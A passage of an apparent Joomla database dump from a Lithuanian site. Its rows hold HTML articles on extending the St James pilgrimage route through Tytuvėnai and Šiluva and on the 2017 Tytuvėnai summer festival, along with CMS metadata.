-webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/zygis/pics{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šventasis Jokūbas – Jėzaus Kristaus mokinys, kuris, kaip tikima, pastarojo skleistą krikščionybės mokslą atnešė iki Ispanijos, iš kur jis vėliau pasklido po Europą ir tapo šio žemyno gyventojų savastimi. Siekiant įtvirtinti krikščioniškąją tapatybę, šventojo Jokūbo ženklu – kriaukle (legenda pasakoja, kad keliaudamas iš Jeruzalės iki Ispanijos miesto Santjago de Kompostelos šis apaštalas iš pakelės šaltinių kriaukle pasisemdavo vandens) žymimos Europos šventovės ir taip tiesiami vadinamieji šventojo Jokūbo keliai, skirti piligrimystei.  Kalbama, kad kriauklės briaunos simbolizuoja daug kelių, kuriuos įveikia piligrimai, galiausiai sueinančių į vieną tašką, šiuo atveju - Santjago de Komposteloje esančią Šv. Jokūbo katedrą, kurioje ilsisi jo palaikai..</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kriauklėmis sužymėtas visas Camino kelias, dažniausiai jos naudojamos kartu su geltonos spalvos rodykle, nurodančia kelionės kryptį.  Iki šiol per visą Europą besidriekiančių šventojo Jokūbo kelių, vedančių į kriauklėmis pažymėtas šventoves, pabaiga buvo Lenkija, o dabar nutarta pažymėti ir Lietuvos bažnyčias bei pratęsti šį kelią.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vyriausybės sprendimu nutarta pažymėti Lietuvoje 11 bažnyčių, pavadintų apaštalo šv. Jokūbo vardu bei 31 šventovę, sutinkamas kelyje lankant šv. Jokūbo bažnyčias. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Daugiau skaitykite: <a href=\"http://lzinios.lt/lzinios/Gimtasis-krastas/sventojo-jokubo-kelias-vingiuos-ir-per-lietuva/222722\" target=\"_blank\">http://lzinios.lt/lzinios/Gimtasis-krastas/sventojo-jokubo-kelias-vingiuos-ir-per-lietuva/222722</a></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Nuo Šiluvos iki Tytuvėnų eina šv. Jokūbo kelio atkarpa . Tytuvėnų bernardinų bažnyčia ir vienuolynas bus pažymėti kriauklės ženklu- stotelė piligrimų kelyje.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų piligrimų centras norėtų pasiūlyti piligrimams keliauti ne krašto keliu Raseiniai-Tytuvėnai-Radviliškis Nr.148, bet einančiu kairiau keliu Nr. 3523 ir keliu Nr. 2127, per miškus, pro Šiluvos tyrelio draustinį, Skogalio kraštovaizdžio draustinį pasiekti Tytuvėnus. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">KELIONĖS APRAŠYMAS</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">9.30 Iš Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios išeinama į kelią.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">10.20 Jau  Pašakarnio kaime. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">11.00  Pusiaukelė- Plekaičių tvenkinys.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">12.30 Šiluvos šventovė pasirodo tolumoje.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">13.00 Šiluvos Švč. Mergelės Marijos Gimimo bazilikoje. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></span></span></p>',1,0,0,44,'2017-05-08 04:30:23',135,'','2018-06-12 15:27:57',135,0,'0000-00-00 00:00:00','2017-05-08 04:30:23','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/zygis\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,95,'','',1,4220,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(285,374,'XIV Tytuvėnų vasaros festivalis','xiv-tytuvenu-vasaros-festivalis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">XIV tarptautinis Tytuvėnų vasaros festivalis.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2017 m. birželio 9 d. - rugpjūčio 26 d.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/tvf2017/main.jpg\" border=\"0\" alt=\"\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>',1,0,0,44,'2017-06-07 09:13:02',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2017-06-07 09:13:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tvf2017\\/tvf.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,94,'','',1,2936,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(286,375,'XIV Tytuvėnų vasaros festivalis','xiv-tytuvenu-vasaros-festivalis-2','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">XIV tarptautinis Tytuvėnų vasaros festivalis.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2017 m. birželio 9 d. - rugpjūčio 26 d.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/tvf2017/main.jpg\" border=\"0\" alt=\"\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>',1,0,0,56,'2017-06-07 09:13:02',135,'','2017-06-07 09:44:51',135,0,'0000-00-00 00:00:00','2017-06-07 09:13:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tvf2017\\/tvf.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,2,'','',1,1176,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(287,376,'XIV Tytuvėnų vasaros festivalio atidarymas','tytuvenu-vasaros-festivalio-atidarymo-momentai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">XIV Tarptautinio Tytuvėnų vasaros festivalio atidarymo momentai. Ansamblis \"Hortus Musicus\" (Estija) atliko įspūdingą viduramžių ir renesanso epochos muzikos programą.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: 